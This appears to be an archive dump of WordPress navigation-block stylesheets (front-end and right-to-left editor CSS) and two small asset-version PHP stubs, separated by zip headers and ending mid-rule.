.wp-block-navigation-item__content:active,.wp-block-navigation.has-text-decoration-underline .wp-block-navigation-item__content:focus{text-decoration:underline}.wp-block-navigation.has-text-decoration-line-through .wp-block-navigation-item__content,.wp-block-navigation.has-text-decoration-line-through .wp-block-navigation-item__content:active,.wp-block-navigation.has-text-decoration-line-through .wp-block-navigation-item__content:focus{text-decoration:line-through}.wp-block-navigation:where(:not([class*=has-text-decoration])) a{text-decoration:none}.wp-block-navigation:where(:not([class*=has-text-decoration])) a:active,.wp-block-navigation:where(:not([class*=has-text-decoration])) a:focus{text-decoration:none}.wp-block-navigation .wp-block-navigation__submenu-icon{align-self:center;background-color:inherit;border:none;color:currentColor;display:inline-block;font-size:inherit;height:.6em;line-height:0;margin-left:.25em;padding:0;width:.6em}.wp-block-navigation .wp-block-navigation__submenu-icon svg{stroke:currentColor;display:inline-block;height:inherit;margin-top:.075em;width:inherit}.wp-block-navigation.is-vertical{--navigation-layout-direction:column;--navigation-layout-justify:initial;--navigation-layout-align:flex-start}.wp-block-navigation.no-wrap{--navigation-layout-wrap:nowrap}.wp-block-navigation.items-justified-center{--navigation-layout-justification-setting:center;--navigation-layout-justify:center}.wp-block-navigation.items-justified-center.is-vertical{--navigation-layout-align:center}.wp-block-navigation.items-justified-right{--navigation-layout-justification-setting:flex-end;--navigation-layout-justify:flex-end}.wp-block-navigation.items-justified-right.is-vertical{--navigation-layout-align:flex-end}.wp-block-navigation.items-justified-space-between{--navigation-layout-justification-setting:space-between;--navigation-layout-justify:space-between}.wp-block-navigation .has-child .wp-block-navigation__submenu-container{align-items:normal;background-color:inherit;color:inherit;display:flex;flex-direction:column;height:0;left:-1px;opacity:0;overflow:hidden;position:absolute;top:100%;transition:opacity .1s linear;visibility:hidden;width:0;z-index:2}.wp-block-navigation .has-child .wp-block-navigation__submenu-container>.wp-block-navigation-item>.wp-block-navigation-item__content{display:flex;flex-grow:1}.wp-block-navigation .has-child .wp-block-navigation__submenu-container>.wp-block-navigation-item>.wp-block-navigation-item__content .wp-block-navigation__submenu-icon{margin-left:auto;margin-right:0}.wp-block-navigation .has-child .wp-block-navigation__submenu-container .wp-block-navigation-item__content{margin:0}@media (min-width:782px){.wp-block-navigation .has-child .wp-block-navigation__submenu-container .wp-block-navigation__submenu-container{left:100%;top:-1px}.wp-block-navigation .has-child .wp-block-navigation__submenu-container .wp-block-navigation__submenu-container:before{background:transparent;content:"";display:block;height:100%;position:absolute;right:100%;width:.5em}.wp-block-navigation .has-child .wp-block-navigation__submenu-container .wp-block-navigation__submenu-icon{margin-right:.25em}.wp-block-navigation .has-child .wp-block-navigation__submenu-container .wp-block-navigation__submenu-icon svg{transform:rotate(-90deg)}}.wp-block-navigation .has-child:not(.open-on-click):hover>.wp-block-navigation__submenu-container{height:auto;min-width:200px;opacity:1;overflow:visible;visibility:visible;width:auto}.wp-block-navigation .has-child:not(.open-on-click):not(.open-on-hover-click):focus-within>.wp-block-navigation__submenu-container{height:auto;min-width:200px;opacity:1;overflow:visible;visibility:visible;width:auto}.wp-block-navigation .has-child .wp-block-navigation-submenu__toggle[aria-expanded=true]~.wp-block-navigation__submenu-container{height:auto;min-width:200px;opacity:1;overflow:visible;visibility:visible;width:auto}.wp-block-navigation.has-background .has-child .wp-block-navigation__submenu-container{left:0;top:100%}@media (min-width:782px){.wp-block-navigation.has-background .has-child .wp-block-navigation__submenu-container .wp-block-navigation__submenu-container{left:100%;top:0}}.wp-block-navigation-submenu{display:flex;position:relative}.wp-block-navigation-submenu .wp-block-navigation__submenu-icon svg{stroke:currentColor}button.wp-block-navigation-item__content{background-color:transparent;border:none;color:currentColor;font-family:inherit;font-size:inherit;font-style:inherit;font-weight:inherit;line-height:inherit;text-align:left;text-transform:inherit}.wp-block-navigation-submenu__toggle{cursor:pointer}.wp-block-navigation-item.open-on-click .wp-block-navigation-submenu__toggle{padding-right:.85em}.wp-block-navigation-item.open-on-click .wp-block-navigation-submenu__toggle+.wp-block-navigation__submenu-icon{margin-left:-.6em;pointer-events:none}.wp-block-navigation .wp-block-page-list,.wp-block-navigation__container,.wp-block-navigation__responsive-close,.wp-block-navigation__responsive-container,.wp-block-navigation__responsive-container-content,.wp-block-navigation__responsive-dialog{gap:inherit}:where(.wp-block-navigation.has-background .wp-block-navigation-item a:not(.wp-element-button)),:where(.wp-block-navigation.has-background .wp-block-navigation-submenu a:not(.wp-element-button)){padding:.5em 1em}:where(.wp-block-navigation .wp-block-navigation__submenu-container .wp-block-navigation-item a:not(.wp-element-button)),:where(.wp-block-navigation .wp-block-navigation__submenu-container .wp-block-navigation-submenu a:not(.wp-element-button)),:where(.wp-block-navigation .wp-block-navigation__submenu-container .wp-block-navigation-submenu button.wp-block-navigation-item__content),:where(.wp-block-navigation .wp-block-navigation__submenu-container .wp-block-pages-list__item button.wp-block-navigation-item__content){padding:.5em 1em}.wp-block-navigation.items-justified-right .wp-block-navigation__container .has-child .wp-block-navigation__submenu-container,.wp-block-navigation.items-justified-right .wp-block-page-list>.has-child .wp-block-navigation__submenu-container,.wp-block-navigation.items-justified-space-between .wp-block-page-list>.has-child:last-child .wp-block-navigation__submenu-container,.wp-block-navigation.items-justified-space-between>.wp-block-navigation__container>.has-child:last-child .wp-block-navigation__submenu-container{left:auto;right:0}.wp-block-navigation.items-justified-right .wp-block-navigation__container .has-child .wp-block-navigation__submenu-container .wp-block-navigation__submenu-container,.wp-block-navigation.items-justified-right .wp-block-page-list>.has-child .wp-block-navigation__submenu-container .wp-block-navigation__submenu-container,.wp-block-navigation.items-justified-space-between .wp-block-page-list>.has-child:last-child .wp-block-navigation__submenu-container .wp-block-navigation__submenu-container,.wp-block-navigation.items-justified-space-between>.wp-block-navigation__container>.has-child:last-child .wp-block-navigation__submenu-container .wp-block-navigation__submenu-container{left:-1px;right:-1px}@media (min-width:782px){.wp-block-navigation.items-justified-right .wp-block-navigation__container .has-child .wp-block-navigation__submenu-container .wp-block-navigation__submenu-container,.wp-block-navigation.items-justified-right .wp-block-page-list>.has-child .wp-block-navigation__submenu-container .wp-block-navigation__submenu-container,.wp-block-navigation.items-justified-space-between .wp-block-page-list>.has-child:last-child .wp-block-navigation__submenu-container .wp-block-navigation__submenu-container,.wp-block-navigation.items-justified-space-between>.wp-block-navigation__container>.has-child:last-child .wp-block-navigation__submenu-container .wp-block-navigation__submenu-container{left:auto;right:100%}}.wp-block-navigation:not(.has-background) .wp-block-navigation__submenu-container{background-color:#fff;border:1px solid rgba(0,0,0,.15)}.wp-block-navigation.has-background .wp-block-navigation__submenu-container{background-color:inherit}.wp-block-navigation:not(.has-text-color) .wp-block-navigation__submenu-container{color:#000}.wp-block-navigation__container{align-items:var(--navigation-layout-align,initial);display:flex;flex-direction:var(--navigation-layout-direction,initial);flex-wrap:var(--navigation-layout-wrap,wrap);justify-content:var(--navigation-layout-justify,initial);list-style:none;margin:0;padding-left:0}.wp-block-navigation__container .is-responsive{display:none}.wp-block-navigation__container:only-child,.wp-block-page-list:only-child{flex-grow:1}@keyframes overlay-menu__fade-in-animation{0%{opacity:0;transform:translateY(.5em)}to{opacity:1;transform:translateY(0)}}.wp-block-navigation__responsive-container{bottom:0;display:none;left:0;position:fixed;right:0;top:0}.wp-block-navigation__responsive-container :where(.wp-block-navigation-item a){color:inherit}.wp-block-navigation__responsive-container .wp-block-navigation__responsive-container-content{align-items:var(--navigation-layout-align,initial);display:flex;flex-direction:var(--navigation-layout-direction,initial);flex-wrap:var(--navigation-layout-wrap,wrap);justify-content:var(--navigation-layout-justify,initial)}.wp-block-navigation__responsive-container:not(.is-menu-open.is-menu-open){background-color:inherit!important;color:inherit!important}.wp-block-navigation__responsive-container.is-menu-open{animation:overlay-menu__fade-in-animation .1s ease-out;animation-fill-mode:forwards;background-color:inherit;display:flex;flex-direction:column;overflow:auto;padding:clamp(1rem,var(--wp--style--root--padding-top),20rem) clamp(1rem,var(--wp--style--root--padding-right),20rem) clamp(1rem,var(--wp--style--root--padding-bottom),20rem) clamp(1rem,var(--wp--style--root--padding-left),20em);z-index:100000}@media (prefers-reduced-motion:reduce){.wp-block-navigation__responsive-container.is-menu-open{animation-delay:0s;animation-duration:1ms}}.wp-block-navigation__responsive-container.is-menu-open .wp-block-navigation__responsive-container-content{align-items:var(--navigation-layout-justification-setting,inherit);display:flex;flex-direction:column;flex-wrap:nowrap;overflow:visible;padding-top:calc(2rem + 24px)}.wp-block-navigation__responsive-container.is-menu-open .wp-block-navigation__responsive-container-content,.wp-block-navigation__responsive-container.is-menu-open .wp-block-navigation__responsive-container-content .wp-block-navigation__container,.wp-block-navigation__responsive-container.is-menu-open .wp-block-navigation__responsive-container-content .wp-block-page-list{justify-content:flex-start}.wp-block-navigation__responsive-container.is-menu-open .wp-block-navigation__responsive-container-content .wp-block-navigation__submenu-icon{display:none}.wp-block-navigation__responsive-container.is-menu-open .wp-block-navigation__responsive-container-content .has-child .wp-block-navigation__submenu-container{border:none;height:auto;min-width:200px;opacity:1;overflow:initial;padding-left:2rem;padding-right:2rem;position:static;visibility:visible;width:auto}.wp-block-navigation__responsive-container.is-menu-open .wp-block-navigation__responsive-container-content .wp-block-navigation__container,.wp-block-navigation__responsive-container.is-menu-open .wp-block-navigation__responsive-container-content .wp-block-navigation__submenu-container{gap:inherit}.wp-block-navigation__responsive-container.is-menu-open .wp-block-navigation__responsive-container-content .wp-block-navigation__submenu-container{padding-top:var(--wp--style--block-gap,2em)}.wp-block-navigation__responsive-container.is-menu-open .wp-block-navigation__responsive-container-content .wp-block-navigation-item__content{padding:0}.wp-block-navigation__responsive-container.is-menu-open .wp-block-navigation__responsive-container-content .wp-block-navigation-item,.wp-block-navigation__responsive-container.is-menu-open .wp-block-navigation__responsive-container-content .wp-block-navigation__container,.wp-block-navigation__responsive-container.is-menu-open .wp-block-navigation__responsive-container-content .wp-block-page-list{align-items:var(--navigation-layout-justification-setting,initial);display:flex;flex-direction:column}.wp-block-navigation__responsive-container.is-menu-open .wp-block-navigation-item,.wp-block-navigation__responsive-container.is-menu-open .wp-block-navigation-item .wp-block-navigation__submenu-container,.wp-block-navigation__responsive-container.is-menu-open .wp-block-navigation__container,.wp-block-navigation__responsive-container.is-menu-open .wp-block-page-list{background:transparent!important;color:inherit!important}.wp-block-navigation__responsive-container.is-menu-open .wp-block-navigation__submenu-container.wp-block-navigation__submenu-container.wp-block-navigation__submenu-container.wp-block-navigation__submenu-container{left:auto;right:auto}@media (min-width:600px){.wp-block-navigation__responsive-container:not(.hidden-by-default):not(.is-menu-open){background-color:inherit;display:block;position:relative;width:100%;z-index:auto}.wp-block-navigation__responsive-container:not(.hidden-by-default):not(.is-menu-open) .wp-block-navigation__responsive-container-close{display:none}.wp-block-navigation__responsive-container.is-menu-open .wp-block-navigation__submenu-container.wp-block-navigation__submenu-container.wp-block-navigation__submenu-container.wp-block-navigation__submenu-container{left:0}}.wp-block-navigation:not(.has-background) .wp-block-navigation__responsive-container.is-menu-open{background-color:#fff}.wp-block-navigation:not(.has-text-color) .wp-block-navigation__responsive-container.is-menu-open{color:#000}.wp-block-navigation__toggle_button_label{font-size:1rem;font-weight:700}.wp-block-navigation__responsive-container-close,.wp-block-navigation__responsive-container-open{background:transparent;border:none;color:currentColor;cursor:pointer;margin:0;padding:0;text-transform:inherit;vertical-align:middle}.wp-block-navigation__responsive-container-close svg,.wp-block-navigation__responsive-container-open svg{fill:currentColor;display:block;height:24px;pointer-events:none;width:24px}.wp-block-navigation__responsive-container-open{display:flex}.wp-block-navigation__responsive-container-open.wp-block-navigation__responsive-container-open.wp-block-navigation__responsive-container-open{font-family:inherit;font-size:inherit;font-weight:inherit}@media (min-width:600px){.wp-block-navigation__responsive-container-open:not(.always-shown){display:none}}.wp-block-navigation__responsive-container-close{position:absolute;right:0;top:0;z-index:2}.wp-block-navigation__responsive-container-close.wp-block-navigation__responsive-container-close.wp-block-navigation__responsive-container-close{font-family:inherit;font-size:inherit;font-weight:inherit}.wp-block-navigation__responsive-close{width:100%}.has-modal-open .wp-block-navigation__responsive-close{margin-left:auto;margin-right:auto;max-width:var(--wp--style--global--wide-size,100%)}.wp-block-navigation__responsive-close:focus{outline:none}.is-menu-open .wp-block-navigation__responsive-close,.is-menu-open .wp-block-navigation__responsive-container-content,.is-menu-open .wp-block-navigation__responsive-dialog{box-sizing:border-box}.wp-block-navigation__responsive-dialog{position:relative}.has-modal-open .admin-bar .is-menu-open .wp-block-navigation__responsive-dialog{margin-top:46px}@media (min-width:782px){.has-modal-open .admin-bar .is-menu-open .wp-block-navigation__responsive-dialog{margin-top:32px}}html.has-modal-open{overflow:hidden}PK7[22navigation/editor-rtl.cssnu[.editor-styles-wrapper .wp-block-navigation ul{ margin-bottom:0; margin-right:0; margin-top:0; padding-right:0; } .editor-styles-wrapper .wp-block-navigation .wp-block-navigation-item.wp-block{ margin:revert; } .wp-block-navigation-item__label{ display:inline; } .wp-block-navigation-item,.wp-block-navigation__container{ background-color:inherit; } .wp-block-navigation:not(.is-selected):not(.has-child-selected) .has-child:hover>.wp-block-navigation__submenu-container{ opacity:0; visibility:hidden; } .has-child.has-child-selected>.wp-block-navigation__submenu-container,.has-child.is-selected>.wp-block-navigation__submenu-container{ display:flex; opacity:1; visibility:visible; } .is-dragging-components-draggable .has-child.is-dragging-within>.wp-block-navigation__submenu-container{ opacity:1; visibility:visible; } .is-editing>.wp-block-navigation__container{ display:flex; flex-direction:column; opacity:1; visibility:visible; } .is-dragging-components-draggable .wp-block-navigation-link>.wp-block-navigation__container{ opacity:1; visibility:hidden; } .is-dragging-components-draggable .wp-block-navigation-link>.wp-block-navigation__container .block-editor-block-draggable-chip-wrapper{ visibility:visible; } .is-editing>.wp-block-navigation__submenu-container>.block-list-appender{ display:block; position:static; width:100%; } .is-editing>.wp-block-navigation__submenu-container>.block-list-appender .block-editor-button-block-appender{ background:#1e1e1e; border-radius:2px; color:#fff; margin-left:0; margin-right:auto; padding:0; width:24px; } .wp-block-navigation__submenu-container .block-list-appender{ display:none; } .block-library-colors-selector{ width:auto; } .block-library-colors-selector .block-library-colors-selector__toggle{ display:block; margin:0 auto; padding:3px; width:auto; } .block-library-colors-selector .block-library-colors-selector__icon-container{ align-items:center; border-radius:4px; display:flex; height:30px; margin:0 auto; padding:3px; position:relative; } .block-library-colors-selector .block-library-colors-selector__state-selection{ border-radius:11px; box-shadow:inset 0 0 0 1px rgba(0,0,0,.2); height:22px; line-height:20px; margin-left:auto; margin-right:auto; min-height:22px; min-width:22px; padding:2px; width:22px; } .block-library-colors-selector .block-library-colors-selector__state-selection>svg{ min-width:auto !important; } .block-library-colors-selector .block-library-colors-selector__state-selection.has-text-color>svg,.block-library-colors-selector .block-library-colors-selector__state-selection.has-text-color>svg path{ color:inherit; } .block-library-colors-selector__popover .color-palette-controller-container{ padding:16px; } .block-library-colors-selector__popover .components-base-control__label{ height:20px; line-height:20px; } .block-library-colors-selector__popover .component-color-indicator{ float:left; margin-top:2px; } .block-library-colors-selector__popover .components-panel__body-title{ display:none; } .wp-block-navigation .wp-block+.block-list-appender .block-editor-button-block-appender{ background-color:#1e1e1e; color:#fff; } .wp-block-navigation .wp-block+.block-list-appender .block-editor-button-block-appender.block-editor-button-block-appender.block-editor-button-block-appender{ padding:0; } .wp-block-navigation .wp-block .wp-block .block-editor-button-block-appender{ background-color:transparent; color:#1e1e1e; } @keyframes loadingpulse{ 0%{ opacity:1; } 50%{ opacity:.5; } to{ opacity:1; } } .components-placeholder.wp-block-navigation-placeholder{ background:none; box-shadow:none; color:inherit; min-height:0; outline:none; padding:0; } .components-placeholder.wp-block-navigation-placeholder .components-placeholder__fieldset{ font-size:inherit; } .components-placeholder.wp-block-navigation-placeholder .components-placeholder__fieldset .components-button{ margin-bottom:0; } .wp-block-navigation.is-selected .components-placeholder.wp-block-navigation-placeholder{ color:#1e1e1e; } .wp-block-navigation-placeholder__preview{ align-items:center; background:transparent; color:currentColor; display:flex; font-family:-apple-system,BlinkMacSystemFont,Segoe UI,Roboto,Oxygen-Sans,Ubuntu,Cantarell,Helvetica Neue,sans-serif; font-size:13px; min-width:96px; } .wp-block-navigation.is-selected .wp-block-navigation-placeholder__preview{ display:none; } .wp-block-navigation-placeholder__preview:before{ border:1px dashed; border-radius:2px; border-radius:inherit; bottom:0; content:""; display:block; left:0; pointer-events:none; position:absolute; right:0; top:0; } .wp-block-navigation-placeholder__preview:before:before{ background:currentColor; bottom:0; content:""; left:0; opacity:.1; pointer-events:none; position:absolute; right:0; top:0; } .wp-block-navigation-placeholder__preview>svg{ fill:currentColor; } .wp-block-navigation.is-vertical .is-medium .components-placeholder__fieldset,.wp-block-navigation.is-vertical .is-small .components-placeholder__fieldset{ min-height:90px; } .wp-block-navigation.is-vertical .is-large .components-placeholder__fieldset{ min-height:132px; } .wp-block-navigation-placeholder__controls,.wp-block-navigation-placeholder__preview{ align-items:flex-start; flex-direction:row; padding:6px 8px; } .wp-block-navigation-placeholder__controls{ background-color:#fff; border-radius:2px; box-shadow:inset 0 0 0 1px #1e1e1e; display:none; float:right; position:relative; width:100%; z-index:1; } .wp-block-navigation.is-selected .wp-block-navigation-placeholder__controls{ display:flex; } .is-medium .wp-block-navigation-placeholder__controls .wp-block-navigation-placeholder__actions__indicator,.is-medium .wp-block-navigation-placeholder__controls .wp-block-navigation-placeholder__actions__indicator+hr,.is-small .wp-block-navigation-placeholder__controls .wp-block-navigation-placeholder__actions__indicator,.is-small .wp-block-navigation-placeholder__controls .wp-block-navigation-placeholder__actions__indicator+hr{ display:none; } .is-small .wp-block-navigation-placeholder__controls .wp-block-navigation-placeholder__actions,.wp-block-navigation.is-vertical .wp-block-navigation-placeholder__controls .wp-block-navigation-placeholder__actions{ align-items:flex-start; flex-direction:column; } .is-small .wp-block-navigation-placeholder__controls .wp-block-navigation-placeholder__actions hr,.wp-block-navigation.is-vertical .wp-block-navigation-placeholder__controls .wp-block-navigation-placeholder__actions hr{ display:none; } .wp-block-navigation-placeholder__controls .wp-block-navigation-placeholder__icon{ height:36px; margin-left:12px; } .wp-block-navigation-placeholder__actions__indicator{ align-items:center; display:flex; height:36px; justify-content:flex-start; line-height:0; margin-right:4px; padding:0 0 0 6px; } .wp-block-navigation-placeholder__actions__indicator svg{ fill:currentColor; margin-left:4px; } .wp-block-navigation .components-placeholder.is-medium .components-placeholder__fieldset{ flex-direction:row !important; } .wp-block-navigation-placeholder__actions{ align-items:center; display:flex; font-family:-apple-system,BlinkMacSystemFont,Segoe UI,Roboto,Oxygen-Sans,Ubuntu,Cantarell,Helvetica Neue,sans-serif; font-size:13px; gap:6px; height:100%; } .wp-block-navigation-placeholder__actions .components-dropdown,.wp-block-navigation-placeholder__actions>.components-button{ margin-left:0; } .wp-block-navigation-placeholder__actions.wp-block-navigation-placeholder__actions hr{ background-color:#1e1e1e; border:0; height:100%; margin:auto 0; max-height:16px; min-height:1px; min-width:1px; } @media (min-width:600px){ .wp-block-navigation__responsive-container:not(.is-menu-open) .components-button.wp-block-navigation__responsive-container-close{ display:none; } } .wp-block-navigation__responsive-container.is-menu-open{ position:fixed; top:155px; } @media (min-width:782px){ .wp-block-navigation__responsive-container.is-menu-open{ right:36px; top:93px; } } @media (min-width:960px){ .wp-block-navigation__responsive-container.is-menu-open{ right:160px; } } @media (min-width:782px){ .has-fixed-toolbar .wp-block-navigation__responsive-container.is-menu-open{ top:141px; } } .is-mobile-preview .wp-block-navigation__responsive-container.is-menu-open,.is-tablet-preview .wp-block-navigation__responsive-container.is-menu-open{ top:141px; } .is-sidebar-opened .wp-block-navigation__responsive-container.is-menu-open{ left:280px; } .is-fullscreen-mode .wp-block-navigation__responsive-container.is-menu-open{ right:0; top:155px; } @media (min-width:782px){ .is-fullscreen-mode .wp-block-navigation__responsive-container.is-menu-open{ top:61px; } .is-fullscreen-mode .has-fixed-toolbar .wp-block-navigation__responsive-container.is-menu-open{ top:109px; } } .is-fullscreen-mode .is-mobile-preview .wp-block-navigation__responsive-container.is-menu-open,.is-fullscreen-mode .is-tablet-preview .wp-block-navigation__responsive-container.is-menu-open{ top:109px; } body.editor-styles-wrapper .wp-block-navigation__responsive-container.is-menu-open{ bottom:0; left:0; right:0; top:0; } .components-button.wp-block-navigation__responsive-container-close.wp-block-navigation__responsive-container-close,.components-button.wp-block-navigation__responsive-container-open.wp-block-navigation__responsive-container-open{ color:inherit; height:auto; padding:0; } .components-heading.wp-block-navigation-off-canvas-editor__title{ margin:0; } .wp-block-navigation-off-canvas-editor__header{ margin-bottom:8px; } .is-menu-open .wp-block-navigation__responsive-container-content * .block-list-appender{ margin-top:16px; } @keyframes fadein{ 0%{ opacity:0; } to{ opacity:1; } } .wp-block-navigation__loading-indicator-container{ padding:8px 12px; } .wp-block-navigation .wp-block-navigation__uncontrolled-inner-blocks-loading-indicator{ margin-top:0; } @keyframes fadeouthalf{ 0%{ opacity:1; } to{ opacity:.5; } } .wp-block-navigation-delete-menu-button{ justify-content:center; margin-bottom:16px; width:100%; } .components-button.is-link.wp-block-navigation-manage-menus-button{ margin-bottom:16px; } .wp-block-navigation__overlay-menu-preview{ align-items:center; background-color:#f0f0f0; display:flex; height:64px; justify-content:space-between; margin-bottom:12px; padding:0 24px; width:100%; } .wp-block-navigation__overlay-menu-preview.open{ background-color:#fff; box-shadow:inset 0 0 0 1px #e0e0e0; outline:1px solid transparent; } .wp-block-navigation-placeholder__actions hr+hr,.wp-block-navigation__toolbar-menu-selector.components-toolbar-group:empty{ display:none; } .wp-block-navigation__navigation-selector{ margin-bottom:16px; width:100%; } .wp-block-navigation__navigation-selector-button{ border:1px solid; justify-content:space-between; width:100%; } .wp-block-navigation__navigation-selector-button__icon{ flex:0 0 auto; } .wp-block-navigation__navigation-selector-button__label{ flex:0 1 auto; overflow:hidden; text-overflow:ellipsis; white-space:nowrap; } .wp-block-navigation__navigation-selector-button--createnew{ border:1px solid; margin-bottom:16px; width:100%; } .wp-block-navigation__responsive-container-open.components-button{ opacity:1; } .wp-block-navigation__menu-inspector-controls{ overflow-x:auto; scrollbar-color:transparent transparent; scrollbar-gutter:stable both-edges; scrollbar-width:thin; will-change:transform; } .wp-block-navigation__menu-inspector-controls::-webkit-scrollbar{ height:12px; width:12px; } .wp-block-navigation__menu-inspector-controls::-webkit-scrollbar-track{ background-color:transparent; } .wp-block-navigation__menu-inspector-controls::-webkit-scrollbar-thumb{ background-clip:padding-box; background-color:transparent; border:3px solid transparent; border-radius:8px; } .wp-block-navigation__menu-inspector-controls:focus-within::-webkit-scrollbar-thumb,.wp-block-navigation__menu-inspector-controls:focus::-webkit-scrollbar-thumb,.wp-block-navigation__menu-inspector-controls:hover::-webkit-scrollbar-thumb{ background-color:#949494; } .wp-block-navigation__menu-inspector-controls:focus,.wp-block-navigation__menu-inspector-controls:focus-within,.wp-block-navigation__menu-inspector-controls:hover{ scrollbar-color:#949494 transparent; } @media (hover:none){ .wp-block-navigation__menu-inspector-controls{ scrollbar-color:#949494 transparent; } } .wp-block-navigation__menu-inspector-controls__empty-message{ margin-right:24px; }PK7[}TTnavigation/view.asset.phpnu[ array(), 'version' => 'b3eba25769c9fe5ec0fa'); PK7[YVTTnavigation/view-modal.asset.phpnu[ array(), 'version' => 'a145d0113e969f692877'); PK7["=.=.navigation/editor-rtl.min.cssnu[.editor-styles-wrapper .wp-block-navigation ul{margin-bottom:0;margin-right:0;margin-top:0;padding-right:0}.editor-styles-wrapper .wp-block-navigation .wp-block-navigation-item.wp-block{margin:revert}.wp-block-navigation-item__label{display:inline}.wp-block-navigation-item,.wp-block-navigation__container{background-color:inherit}.wp-block-navigation:not(.is-selected):not(.has-child-selected) .has-child:hover>.wp-block-navigation__submenu-container{opacity:0;visibility:hidden}.has-child.has-child-selected>.wp-block-navigation__submenu-container,.has-child.is-selected>.wp-block-navigation__submenu-container{display:flex;opacity:1;visibility:visible}.is-dragging-components-draggable .has-child.is-dragging-within>.wp-block-navigation__submenu-container{opacity:1;visibility:visible}.is-editing>.wp-block-navigation__container{display:flex;flex-direction:column;opacity:1;visibility:visible}.is-dragging-components-draggable .wp-block-navigation-link>.wp-block-navigation__container{opacity:1;visibility:hidden}.is-dragging-components-draggable .wp-block-navigation-link>.wp-block-navigation__container .block-editor-block-draggable-chip-wrapper{visibility:visible}.is-editing>.wp-block-navigation__submenu-container>.block-list-appender{display:block;position:static;width:100%}.is-editing>.wp-block-navigation__submenu-container>.block-list-appender .block-editor-button-block-appender{background:#1e1e1e;border-radius:2px;color:#fff;margin-left:0;margin-right:auto;padding:0;width:24px}.wp-block-navigation__submenu-container .block-list-appender{display:none}.block-library-colors-selector{width:auto}.block-library-colors-selector .block-library-colors-selector__toggle{display:block;margin:0 auto;padding:3px;width:auto}.block-library-colors-selector .block-library-colors-selector__icon-container{align-items:center;border-radius:4px;display:flex;height:30px;margin:0 auto;padding:3px;position:relative}.block-library-colors-selector .block-library-colors-selector__state-selection{border-radius:11px;box-shadow:inset 0 0 0 1px rgba(0,0,0,.2);height:22px;line-height:20px;margin-left:auto;margin-right:auto;min-height:22px;min-width:22px;padding:2px;width:22px}.block-library-colors-selector .block-library-colors-selector__state-selection>svg{min-width:auto!important}.block-library-colors-selector .block-library-colors-selector__state-selection.has-text-color>svg,.block-library-colors-selector .block-library-colors-selector__state-selection.has-text-color>svg path{color:inherit}.block-library-colors-selector__popover .color-palette-controller-container{padding:16px}.block-library-colors-selector__popover .components-base-control__label{height:20px;line-height:20px}.block-library-colors-selector__popover .component-color-indicator{float:left;margin-top:2px}.block-library-colors-selector__popover .components-panel__body-title{display:none}.wp-block-navigation .wp-block+.block-list-appender .block-editor-button-block-appender{background-color:#1e1e1e;color:#fff}.wp-block-navigation .wp-block+.block-list-appender .block-editor-button-block-appender.block-editor-button-block-appender.block-editor-button-block-appender{padding:0}.wp-block-navigation .wp-block .wp-block .block-editor-button-block-appender{background-color:transparent;color:#1e1e1e}@keyframes loadingpulse{0%{opacity:1}50%{opacity:.5}to{opacity:1}}.components-placeholder.wp-block-navigation-placeholder{background:none;box-shadow:none;color:inherit;min-height:0;outline:none;padding:0}.components-placeholder.wp-block-navigation-placeholder .components-placeholder__fieldset{font-size:inherit}.components-placeholder.wp-block-navigation-placeholder .components-placeholder__fieldset .components-button{margin-bottom:0}.wp-block-navigation.is-selected .components-placeholder.wp-block-navigation-placeholder{color:#1e1e1e}.wp-block-navigation-placeholder__preview{align-items:center;background:transparent;color:currentColor;display:flex;font-family:-apple-system,BlinkMacSystemFont,Segoe UI,Roboto,Oxygen-Sans,Ubuntu,Cantarell,Helvetica Neue,sans-serif;font-size:13px;min-width:96px}.wp-block-navigation.is-selected .wp-block-navigation-placeholder__preview{display:none}.wp-block-navigation-placeholder__preview:before{border:1px dashed;border-radius:2px;border-radius:inherit;bottom:0;content:"";display:block;left:0;pointer-events:none;position:absolute;right:0;top:0}.wp-block-navigation-placeholder__preview:before:before{background:currentColor;bottom:0;content:"";left:0;opacity:.1;pointer-events:none;position:absolute;right:0;top:0}.wp-block-navigation-placeholder__preview>svg{fill:currentColor}.wp-block-navigation.is-vertical .is-medium .components-placeholder__fieldset,.wp-block-navigation.is-vertical .is-small .components-placeholder__fieldset{min-height:90px}.wp-block-navigation.is-vertical .is-large .components-placeholder__fieldset{min-height:132px}.wp-block-navigation-placeholder__controls,.wp-block-navigation-placeholder__preview{align-items:flex-start;flex-direction:row;padding:6px 8px}.wp-block-navigation-placeholder__controls{background-color:#fff;border-radius:2px;box-shadow:inset 0 0 0 1px #1e1e1e;display:none;float:right;position:relative;width:100%;z-index:1}.wp-block-navigation.is-selected .wp-block-navigation-placeholder__controls{display:flex}.is-medium .wp-block-navigation-placeholder__controls .wp-block-navigation-placeholder__actions__indicator,.is-medium .wp-block-navigation-placeholder__controls .wp-block-navigation-placeholder__actions__indicator+hr,.is-small .wp-block-navigation-placeholder__controls .wp-block-navigation-placeholder__actions__indicator,.is-small .wp-block-navigation-placeholder__controls .wp-block-navigation-placeholder__actions__indicator+hr{display:none}.is-small .wp-block-navigation-placeholder__controls .wp-block-navigation-placeholder__actions,.wp-block-navigation.is-vertical .wp-block-navigation-placeholder__controls .wp-block-navigation-placeholder__actions{align-items:flex-start;flex-direction:column}.is-small .wp-block-navigation-placeholder__controls .wp-block-navigation-placeholder__actions hr,.wp-block-navigation.is-vertical .wp-block-navigation-placeholder__controls .wp-block-navigation-placeholder__actions hr{display:none}.wp-block-navigation-placeholder__controls .wp-block-navigation-placeholder__icon{height:36px;margin-left:12px}.wp-block-navigation-placeholder__actions__indicator{align-items:center;display:flex;height:36px;justify-content:flex-start;line-height:0;margin-right:4px;padding:0 0 0 6px}.wp-block-navigation-placeholder__actions__indicator svg{fill:currentColor;margin-left:4px}.wp-block-navigation .components-placeholder.is-medium .components-placeholder__fieldset{flex-direction:row!important}.wp-block-navigation-placeholder__actions{align-items:center;display:flex;font-family:-apple-system,BlinkMacSystemFont,Segoe UI,Roboto,Oxygen-Sans,Ubuntu,Cantarell,Helvetica Neue,sans-serif;font-size:13px;gap:6px;height:100%}.wp-block-navigation-placeholder__actions .components-dropdown,.wp-block-navigation-placeholder__actions>.components-button{margin-left:0}.wp-block-navigation-placeholder__actions.wp-block-navigation-placeholder__actions hr{background-color:#1e1e1e;border:0;height:100%;margin:auto 0;max-height:16px;min-height:1px;min-width:1px}@media (min-width:600px){.wp-block-navigation__responsive-container:not(.is-menu-open) .components-button.wp-block-navigation__responsive-container-close{display:none}}.wp-block-navigation__responsive-container.is-menu-open{position:fixed;top:155px}@media (min-width:782px){.wp-block-navigation__responsive-container.is-menu-open{right:36px;top:93px}}@media (min-width:960px){.wp-block-navigation__responsive-container.is-menu-open{right:160px}}@media (min-width:782px){.has-fixed-toolbar 